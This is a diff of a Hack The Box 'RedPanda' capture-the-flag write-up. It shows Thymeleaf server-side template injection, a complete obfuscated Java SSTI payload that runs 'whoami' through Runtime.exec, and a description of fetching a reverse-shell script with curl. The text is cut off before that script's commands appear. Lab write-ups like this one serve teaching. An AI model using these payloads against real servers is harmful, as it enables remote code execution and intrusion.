MrLarryMan/hackthebox/RedPanda/RedPandaWriteup.md

 <img src="Images/Image2.png" alt="Image2" width="75%"/>

 However, passing in *{7 * 7} and #{7 * 7} yielded 49.
 Since Thymeleaf runs java, you can pass in expressions using objects like *{T(java.lang.Runtime)} to execute java commands.
-To run bash commands, we can use a specific tool to parse commands in such a way that they are executed on their machine, at https://github.com/adeiarias/Java-SSTI-generator.
-For example, if I want to run whoami, I would have to turn it into a java SSTI payload first and then pass it into the search query.
+To run bash commands, I used a tool to parse commands in such a way that they are executed on their machine, found at https://github.com/adeiarias/Java-SSTI-generator.
+For example, if I wanted to run whoami, I would have had to turn it into a java SSTI payload first and then pass it into the search query.

 ```bash
 whoami --> *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105))).getInputStream())}
 ```

-Now that I have RCE, I can try getting a remote shell.
-For some reason, oneline reverse shell commands aren't working, so I download a bash script on their machine instead using a local python server and curl to get a reverse shell.
+Now that I had RCE, I tried getting a remote shell.
+For some reason, oneline reverse shell commands weren't working, so I downloaded a bash script on their machine instead using a local python server and curl in order to get a reverse shell.

 ```bash
 #My Machine, in a directory with the payload